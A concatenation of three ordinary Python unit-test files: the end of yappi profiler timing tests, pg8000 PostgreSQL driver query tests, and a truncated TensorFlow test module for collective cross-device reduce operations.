self.assertEqual(cfsca.ttot , 13)
self.assertEqual(cfsca.tsub , 8)
def test_abcbca(self):
_timings = {"a_1":10,"b_1":9,"c_1":7,"b_2":4,"c_2":2,"a_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
else:
return
def b():
c()
def c():
if self._ncall == 1:
self._ncall += 1
b()
else:
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfsca = fsc.children[fsa]
self.assertEqual(fsa.ttot , 10)
self.assertEqual(fsa.tsub , 2)
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 4)
self.assertEqual(fsc.ttot , 7)
self.assertEqual(fsc.tsub , 4)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 2)
self.assertEqual(cfsbc.ttot , 7)
self.assertEqual(cfsbc.tsub , 4)
self.assertEqual(cfsca.ttot , 1)
self.assertEqual(cfsca.tsub , 1)
self.assertEqual(cfsca.ncall , 1)
self.assertEqual(cfsca.nactualcall , 0)
def test_aabccb(self):
_timings = {"a_1":13,"a_2":11,"b_1":9,"c_1":5,"c_2":3,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
self._ncall += 1
a()
else:
b()
def b():
if self._ncall == 3:
return
else:
c()
def c():
if self._ncall == 2:
self._ncall += 1
c()
else:
b()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
cfsaa = fsa.children[fsa.index]
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc.full_name]
cfscc = fsc.children[fsc]
cfscb = fsc.children[fsb]
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 5)
self.assertEqual(cfsbc.ttot , 5)
self.assertEqual(cfsbc.tsub , 2)
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 4)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsaa.ttot , 11)
self.assertEqual(cfsaa.tsub , 2)
self.assertEqual(fsc.ttot , 5)
self.assertEqual(fsc.tsub , 4)
def test_abaa(self):
_timings = {"a_1":13,"b_1":10,"a_2":9,"a_3":5}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
elif self._ncall == 2:
self._ncall += 1
a()
else:
return
def b():
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsba = fsb.children[fsa]
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 1)
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 12)
self.assertEqual(cfsaa.ttot , 5)
self.assertEqual(cfsaa.tsub , 5)
self.assertEqual(cfsba.ttot , 9)
self.assertEqual(cfsba.tsub , 4)
def test_aabb(self):
_timings = {"a_1":13,"a_2":10,"b_1":9,"b_2":5}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
self._ncall += 1
a()
elif self._ncall == 2:
b()
else:
return
def b():
if self._ncall == 2:
self._ncall += 1
b()
else:
return
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsab = fsa.children[fsb]
cfsbb = fsb.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 4)
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 9)
self.assertEqual(cfsaa.ttot , 10)
self.assertEqual(cfsaa.tsub , 1)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbb.ttot , 5)
self.assertEqual(cfsbb.tsub , 5)
def test_abbb(self):
_timings = {"a_1":13,"b_1":10,"b_2":6,"b_3":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
def b():
if self._ncall == 3:
return
self._ncall += 1
b()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsab = fsa.children[fsb]
cfsbb = fsb.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 3)
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 10)
self.assertEqual(fsb.ncall , 3)
self.assertEqual(fsb.nactualcall , 1)
self.assertEqual(cfsab.ttot , 10)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbb.ttot , 6)
self.assertEqual(cfsbb.tsub , 6)
self.assertEqual(cfsbb.nactualcall , 0)
self.assertEqual(cfsbb.ncall , 2)
def test_aaab(self):
_timings = {"a_1":13,"a_2":10,"a_3":6,"b_1":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 3:
b()
return
self._ncall += 1
a()
def b():
return
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsaa = fsa.children[fsa]
cfsab = fsa.children[fsb]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 12)
self.assertEqual(fsb.ttot , 1)
self.assertEqual(fsb.tsub , 1)
self.assertEqual(cfsaa.ttot , 10)
self.assertEqual(cfsaa.tsub , 9)
self.assertEqual(cfsab.ttot , 1)
self.assertEqual(cfsab.tsub , 1)
def test_abab(self):
_timings = {"a_1":13,"b_1":10,"a_2":6,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
b()
def b():
if self._ncall == 2:
return
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
cfsab = fsa.children[fsb]
cfsba = fsb.children[fsa]
self.assertEqual(fsa.ttot , 13)
self.assertEqual(fsa.tsub , 8)
self.assertEqual(fsb.ttot , 10)
self.assertEqual(fsb.tsub , 5)
self.assertEqual(cfsab.ttot , 10)
self.assertEqual(cfsab.tsub , 5)
self.assertEqual(cfsab.ncall , 2)
self.assertEqual(cfsab.nactualcall , 1)
self.assertEqual(cfsba.ttot , 6)
self.assertEqual(cfsba.tsub , 5)
|
test_query.py
|
import unittest
import threading
import pg8000
from .connection_settings import db_connect
from six import u
from sys import exc_info
import datetime
from distutils.version import LooseVersion
from warnings import filterwarnings
# Tests relating to the basic operation of the database driver, driven by the
# pg8000 custom interface.
class Tests(unittest.TestCase):
def setUp(self):
self.db = pg8000.connect(**db_connect)
filterwarnings("ignore", "DB-API extension cursor.next()")
filterwarnings("ignore", "DB-API extension cursor.__iter__()")
self.db.paramstyle = 'format'
try:
cursor = self.db.cursor()
try:
cursor.execute("DROP TABLE t1")
except pg8000.DatabaseError:
e = exc_info()[1]
# the only acceptable error is:
self.assertEqual(e.args[1], '42P01') # table does not exist
self.db.rollback()
cursor.execute(
"CREATE TEMPORARY TABLE t1 (f1 int primary key, "
"f2 bigint not null, f3 varchar(50) null)")
finally:
cursor.close()
self.db.commit()
def tearDown(self):
self.db.close()
def testDatabaseError(self):
try:
cursor = self.db.cursor()
self.assertRaises(
pg8000.ProgrammingError, cursor.execute,
"INSERT INTO t99 VALUES (1, 2, 3)")
finally:
cursor.close()
self.db.rollback()
def testParallelQueries(self):
try:
cursor = self.db.cursor()
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(1, 1, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(2, 10, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(3, 100, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(4, 1000, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(5, 10000, None))
try:
c1 = self.db.cursor()
c2 = self.db.cursor()
c1.execute("SELECT f1, f2, f3 FROM t1")
for row in c1:
f1, f2, f3 = row
c2.execute(
"SELECT f1, f2, f3 FROM t1 WHERE f1 > %s", (f1,))
for row in c2:
f1, f2, f3 = row
finally:
c1.close()
c2.close()
finally:
cursor.close()
self.db.rollback()
def testParallelOpenPortals(self):
try:
c1, c2 = self.db.cursor(), self.db.cursor()
c1count, c2count = 0, 0
q = "select * from generate_series(1, %s)"
params = (self.db._row_cache_size + 1,)
c1.execute(q, params)
c2.execute(q, params)
for c2row in c2:
c2count += 1
for c1row in c1:
c1count += 1
finally:
c1.close()
c2.close()
self.db.rollback()
self.assertEqual(c1count, c2count)
# Test query works if the number of rows returned is exactly the same as
# the size of the row cache
def testQuerySizeCache(self):
try:
cursor = self.db.cursor()
cursor.execute(
"select * from generate_series(1, %s)",
(self.db._row_cache_size,))
for row in cursor:
pass
finally:
cursor.close()
self.db.rollback()
# Run a query on a table, alter the structure of the table, then run the
# original query again.
def testAlter(self):
try:
cursor = self.db.cursor()
cursor.execute("select * from t1")
cursor.execute("alter table t1 drop column f3")
cursor.execute("select * from t1")
finally:
cursor.close()
self.db.rollback()
# Run a query on a table, drop then re-create the table, then run the
# original query again.
def testCreate(self):
try:
cursor = self.db.cursor()
cursor.execute("select * from t1")
cursor.execute("drop table t1")
cursor.execute("create temporary table t1 (f1 int primary key)")
cursor.execute("select * from t1")
finally:
cursor.close()
self.db.rollback()
def testInsertReturning(self):
try:
cursor = self.db.cursor()
cursor.execute("CREATE TABLE t2 (id serial, data text)")
# Test INSERT ... RETURNING with one row...
cursor.execute(
"INSERT INTO t2 (data) VALUES (%s) RETURNING id",
("test1",))
row_id = cursor.fetchone()[0]
cursor.execute("SELECT data FROM t2 WHERE id = %s", (row_id,))
self.assertEqual("test1", cursor.fetchone()[0])
# Before PostgreSQL 9 we don't know the row count for a select
if self.db._server_version > LooseVersion('8.0.0'):
self.assertEqual(cursor.rowcount, 1)
# Test with multiple rows...
cursor.execute(
"INSERT INTO t2 (data) VALUES (%s), (%s), (%s) "
"RETURNING id", ("test2", "test3", "test4"))
self.assertEqual(cursor.rowcount, 3)
ids = tuple([x[0] for x in cursor])
self.assertEqual(len(ids), 3)
finally:
cursor.close()
self.db.rollback()
def testMultithreadedCursor(self):
try:
cursor = self.db.cursor()
# Note: Multithreading with a cursor is not highly recommended due
# to low performance.
def test(left, right):
for i in range(left, right):
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(i, id(threading.currentThread()), None))
t1 = threading.Thread(target=test, args=(1, 25))
t2 = threading.Thread(target=test, args=(25, 50))
t3 = threading.Thread(target=test, args=(50, 75))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
finally:
cursor.close()
self.db.rollback()
def testRowCount(self):
# Before PostgreSQL 9 we don't know the row count for a select
if self.db._server_version > LooseVersion('8.0.0'):
try:
cursor = self.db.cursor()
expected_count = 57
cursor.executemany(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
tuple((i, i, None) for i in range(expected_count)))
# Check rowcount after executemany
self.assertEqual(expected_count, cursor.rowcount)
self.db.commit()
cursor.execute("SELECT * FROM t1")
# Check row_count without doing any reading first...
self.assertEqual(expected_count, cursor.rowcount)
# Check rowcount after reading some rows, make sure it still
# works...
for i in range(expected_count // 2):
cursor.fetchone()
self.assertEqual(expected_count, cursor.rowcount)
finally:
cursor.close()
self.db.commit()
try:
cursor = self.db.cursor()
# Restart the cursor, read a few rows, and then check rowcount
# again...
cursor = self.db.cursor()
cursor.execute("SELECT * FROM t1")
for i in range(expected_count // 3):
cursor.fetchone()
self.assertEqual(expected_count, cursor.rowcount)
self.db.rollback()
# Should be -1 for a command with no results
cursor.execute("DROP TABLE t1")
self.assertEqual(-1, cursor.rowcount)
finally:
cursor.close()
self.db.commit()
def testRowCountUpdate(self):
try:
cursor = self.db.cursor()
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(1, 1, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(2, 10, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(3, 100, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(4, 1000, None))
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(5, 10000, None))
cursor.execute("UPDATE t1 SET f3 = %s WHERE f2 > 101", ("Hello!",))
self.assertEqual(cursor.rowcount, 2)
finally:
cursor.close()
self.db.commit()
def testIntOid(self):
try:
cursor = self.db.cursor()
# https://bugs.launchpad.net/pg8000/+bug/230796
cursor.execute(
"SELECT typname FROM pg_type WHERE oid = %s", (100,))
finally:
cursor.close()
self.db.rollback()
def testUnicodeQuery(self):
try:
cursor = self.db.cursor()
cursor.execute(
u(
"CREATE TEMPORARY TABLE \u043c\u0435\u0441\u0442\u043e "
"(\u0438\u043c\u044f VARCHAR(50), "
"\u0430\u0434\u0440\u0435\u0441 VARCHAR(250))"))
finally:
cursor.close()
self.db.commit()
def testExecutemany(self):
try:
cursor = self.db.cursor()
cursor.executemany(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
((1, 1, 'Avast ye!'), (2, 1, None)))
cursor.executemany(
"select %s",
(
(datetime.datetime(2014, 5, 7, tzinfo=pg8000.core.utc), ),
(datetime.datetime(2014, 5, 7),)))
finally:
cursor.close()
self.db.commit()
# Check that autocommit stays off
# We keep track of whether we're in a transaction or not by using the
# READY_FOR_QUERY message.
def testTransactions(self):
try:
cursor = self.db.cursor()
cursor.execute("commit")
cursor.execute(
"INSERT INTO t1 (f1, f2, f3) VALUES (%s, %s, %s)",
(1, 1, "Zombie"))
cursor.execute("rollback")
cursor.execute("select * from t1")
# Before PostgreSQL 9 we don't know the row count for a select
if self.db._server_version > LooseVersion('8.0.0'):
self.assertEqual(cursor.rowcount, 0)
finally:
cursor.close()
self.db.commit()
def testIn(self):
try:
cursor = self.db.cursor()
cursor.execute(
"SELECT typname FROM pg_type WHERE oid = any(%s)", ([16, 23],))
ret = cursor.fetchall()
self.assertEqual(ret[0][0], 'bool')
finally:
cursor.close()
def test_no_previous_tpc(self):
try:
self.db.tpc_begin('Stacey')
cursor = self.db.cursor()
cursor.execute("SELECT * FROM pg_type")
self.db.tpc_commit()
finally:
cursor.close()
# Check that tpc_recover() doesn't start a transaction
def test_tpc_recover(self):
try:
self.db.tpc_recover()
cursor = self.db.cursor()
self.db.autocommit = True
# If tpc_recover() has started a transaction, this will fail
cursor.execute("VACUUM")
finally:
cursor.close()
# An empty query should raise a ProgrammingError
def test_empty_query(self):
try:
cursor = self.db.cursor()
self.assertRaises(pg8000.ProgrammingError, cursor.execute, "")
finally:
cursor.close()
# rolling back when not in a transaction doesn't generate a warning
def test_rollback_no_transaction(self):
try:
cursor = self.db.cursor()
notices = []
self.db.NoticeReceived += notices.append
# First, verify that a raw rollback does produce a notice
self.db.execute(cursor, "rollback", None)
self.assertEqual(1, len(notices))
# 25P01 is the code for no_active_sql_tronsaction. It has
# a message and severity name, but those might be
# localized/depend on the server version.
self.assertEqual(notices[0].get(b'C'), b'25P01')
notices.pop()
# Now going through the rollback method doesn't produce
# any notices because it knows we're not in a transaction.
self.db.rollback()
self.assertEqual(0, len(notices))
finally:
cursor.close()
def test_context_manager_class(self):
self.assertTrue('__enter__' in pg8000.core.Cursor.__dict__)
self.assertTrue('__exit__' in pg8000.core.Cursor.__dict__)
with self.db.cursor() as cursor:
cursor.execute('select 1')
if __name__ == "__main__":
unittest.main()
|
cross_device_ops_test.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for CrossDeviceOps."""
import collections
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python.distribute import cluster_resolver as cluster_resolver_lib
from tensorflow.python.distribute import collective_util
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import test_util
from tensorflow.python.distribute import values as value_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.util import nest
CollectiveReplicaLauncher = cross_device_utils.CollectiveReplicaLauncher
CommunicationImplementation = collective_util.CommunicationImplementation
ReduceOp = reduce_util.ReduceOp
IndexedSlicesValue = indexed_slices.IndexedSlicesValue
IndexedSlices = indexed_slices.IndexedSlices
def make_per_replica_value(value, devices):
"""Creates a `PerReplica` object whose values reside in `devices`.
Args:
value: a tensor-convertible value or a `IndexedSlicesValue`, or a callable
that takes one argument (`device_idx`) and should return the value that is
going to be created on devices[device_idx].
devices: a list of device strings to create `PerReplica` values on.
Returns:
A `PerReplica` object.
"""
values = []
for device_idx, device in enumerate(devices):
if callable(value):
v = value(device_idx)
elif isinstance(value, list):
v = value[device_idx]
else:
v = value
if isinstance(v, IndexedSlicesValue):
with ops.device(device):
values.append(
IndexedSlices(
values=array_ops.identity(v.values),
indices=array_ops.identity(v.indices),
dense_shape=array_ops.identity(v.dense_shape)))
else:
with ops.device(device):
values.append(array_ops.identity(v))
return value_lib.PerReplica(values)
def enable_collective_ops():
"""Enable collectives in the current process."""
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
context.context().configure_collective_ops(
collective_leader="'/job:worker/replica:0/task:0'")
config_proto = config_pb2.ConfigProto()
config_proto.experimental.collective_group_leader = (
"/job:worker/replica:0/task:0")
server_def = tensorflow_server_pb2.ServerDef(
cluster=cluster_resolver.cluster_spec().as_cluster_def(),
default_session_config=config_proto,
job_name=cluster_resolver.task_type,
task_index=cluster_resolver.task_id,
protocol=cluster_resolver.rpc_layer)
context.context().enable_collective_ops(server_def)
# Recover default flag values.
CollectiveReplicaLauncher._prefer_unique_instance_key = True
CollectiveReplicaLauncher._prefer_ordering_token = False
class MultiProcessPoolRunner():
def __init__(self, num_processes):
cluster_spec_dict = multi_worker_test_base.create_cluster_spec(
num_workers=num_processes)
self.runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec_dict)
# Global MultiProcessPoolRunners that can be shared by test cases to avoid
# expensive initialization cost of TensorFlow in new processes.
#
# Note that they have to be globals and can't be owned by test classes because
# usually fn usually captures the test class instance, and test class
# instance can't be pickled if it has mpr as a member (it is not allowed to
# pickle Process objects).
# TODO(crccw): Use `num_workers` combination once it is ready.
global_mpr_2p = MultiProcessPoolRunner(num_processes=2)
global_mpr_1p = MultiProcessPoolRunner(num_processes=1)
def get_global_mpr(num_processes):
if num_processes == 1:
return global_mpr_1p.runner
elif num_processes == 2:
return global_mpr_2p.runner
else:
raise ValueError("get_global_mpr: num_processes must be 1 or 2, got %d" %
num_processes)
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
super().setUp()
# Enabling collectives can be done in "setUpClass", but requires using
# different collective_keys in different tests as collectives are reused
# across tests. Always resetting collective ops before each test offers
# better test isolation.
global_mpr_1p.runner.run(enable_collective_ops)
global_mpr_2p.runner.run(enable_collective_ops)
def make_collective(self, num_processes, gpu_per_process):
"""Returns collectives and other info to be used in tests.
Args:
num_processes: an integer indicating the number of processes that
participate in the collective.
gpu_per_process: number of GPUs (0 if no GPUs) used by each process.
Returns:
A tuple of (collective, devices, pid) where collective is a instance
of `CollectiveAllReduce`, devices are a list of local devices (str)
attached to the current process, and pid is the id of this process among
all participant processes.
"""
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
devices = [
"/job:worker/replica:0/task:%d/device:CPU:0" % cluster_resolver.task_id
]
if gpu_per_process > 0:
devices = [
"/job:worker/replica:0/task:%d/device:GPU:%d" %
(cluster_resolver.task_id, i) for i in range(gpu_per_process)
]
group_size = num_processes * len(devices)
collective = cross_device_ops_lib.CollectiveAllReduce(
devices=devices,
group_size=group_size,
options=collective_util.Options())
return collective, devices, cluster_resolver.task_id
def as_list(self, value):
"""An utility to convert a `Mirrored`, `Tensor` or `IndexedSlices` to a list.
The reason it exists is to provide a uniformed view of returned value of
"reduce" calls, especially across tf.function boundaries. Returning
`Mirrored` from a tf.function will only evaluate the primary value, which
makes collective ops of non-primary device being pruned, and will eventually
cause hanging.
Args:
value: the value to convert, can be one of `Mirrored`, `Tensor` and
`IndexedSlices`.
Returns:
A list of `Tensor` or `IndexedSlices`.
"""
if isinstance(value, ops.Tensor):
return [value]
elif isinstance(value, IndexedSlices):
return [value]
elif isinstance(value, value_lib.Mirrored):
return value.values
else:
raise ValueError("unwrap: unsupported input type: %s" % type(value))
RunOptions = collections.namedtuple( # pylint: disable=invalid-name
"RunOptions",
[
"mode", # A list of str from ["eager", "func_graph"]
"num_processes",
"gpus_per_process",
"reduce_op",
"communication_options",
"prefer_unique_instance_key",
])
RunOptions.__new__.__defaults__ = (["eager",
"func_graph"], 2, 0, ReduceOp.SUM,
collective_util.Options(), True)
def reduce_and_verify(self, inputs, expect, options):
"""Reduce the given `inputs` and verify the output matches `expect`.
Args:
inputs: a list of `Tensor` or `IndexedSlices`, where i-th value will be
fed to i-th replica.
expect: a `Tensor` or `IndexedSlices`. This should be the expected value
for one replica.
options: a `RunOpotions` instance.
"""
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
options.prefer_unique_instance_key)
collective, devices, pid = self.make_collective(options.num_processes,
options.gpus_per_process)
def reduce_fn():
value_fn = lambda device_idx: inputs[pid * len(devices) + device_idx]
per_replica_value = make_per_replica_value(value_fn, devices)
reduced_values = collective.reduce(options.reduce_op, per_replica_value,
per_replica_value,
options.communication_options)
if options.gpus_per_process > 1:
self.assertIsInstance(reduced_values, value_lib.Mirrored)
reduced_values = self.as_list(reduced_values)
self.assertAllEqual(devices, [v.device for v in reduced_values])
return [ops.convert_to_tensor(v) for v in reduced_values]
per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)
if "eager" in options.mode:
got = reduce_fn()
self.assertAllClose(got, per_replica_expect)
if "func_graph" in options.mode:
got = def_function.function(reduce_fn)()
self.assertAllClose(got, per_replica_expect)
get_global_mpr(options.num_processes).run(replica_fn)
def batch_reduce_and_verify(self, inputs, expect, options):
"""Batch reduce the given `inputs` and verify the output matches `expect`.
Args:
inputs: a 2-level nested list of `Tensor` or `IndexedSlices`, where i-th
value will be fed to i-th replica.
expect: a list of `Tensor` or `IndexedSlices`. This should be the expected
value for one replica.
options: a `RunOpotions` instance.
"""
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
options.prefer_unique_instance_key)
collective, devices, pid = self.make_collective(options.num_processes,
options.gpus_per_process)
def batch_reduce_fn():
batch_size = len(inputs[0])
value_dst_pairs = []
for i in range(batch_size):
def value_fn(device_idx, idx=i):
return inputs[pid * len(devices) + device_idx][idx]
per_replica_value = make_per_replica_value(value_fn, devices)
value_dst_pairs.append((per_replica_value, per_replica_value))
reduced_values = collective.batch_reduce(options.reduce_op,
value_dst_pairs,
options.communication_options)
if options.gpus_per_process > 1:
for v in reduced_values:
self.assertIsInstance(v, value_lib.Mirrored)
reduced_values = [self.as_list(v) for v in reduced_values]
for v in reduced_values:
self.assertAllEqual(devices, [t.device for t in v])
return nest.map_structure(ops.convert_to_tensor, reduced_values)
per_replica_expect = nest.map_structure(
lambda x: [ops.convert_to_tensor(x)] * len(devices), expect)
if "eager" in options.mode:
got = batch_reduce_fn()
self.assertAllClose(got, per_replica_expect)
if "func_graph" in options.mode:
got = def_function.function(batch_reduce_fn)()
self.assertAllClose(got, per_replica_expect)
get_global_mpr(options.num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [1.0, 2.0, 3.0, 4.0]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = 1.0
if group_size == 2:
expect = 3.0 if reduce_op == ReduceOp.SUM else 1.5
elif group_size == 4:
expect = 10.0 if reduce_op == ReduceOp.SUM else 2.5
self.reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
# TODO(b/166682130): add MEAN reduce once the bug is fixed.
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=[True, False]))
def testReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
options = self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[5.], [6.]], indices=[7, 8], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[3, 2], dense_shape=[10, 1]),
]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = IndexedSlices(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1])
elif group_size == 2:
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1])
elif group_size == 4:
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.], [5.], [6.], [7.], [8.]],
indices=[0, 1, 1, 2, 7, 8, 3, 2],
dense_shape=[10, 1])
self.reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(prefer_unique_instance_key=[True, False]))
def testReduceSparseVariableLength(self, prefer_unique_instance_key):
# One device per process, 2 processes, 2 replicas in total.
inputs = [
IndexedSlicesValue(values=[[1.]], indices=[0], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[2.], [3.], [4.]], indices=[0, 1, 2], dense_shape=[10, 1]),
]
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.]],
indices=[0, 0, 1, 2],
dense_shape=[10, 1])
self.reduce_and_verify(
inputs,
expect,
self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=2,
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=prefer_unique_instance_key))
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testBatchReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
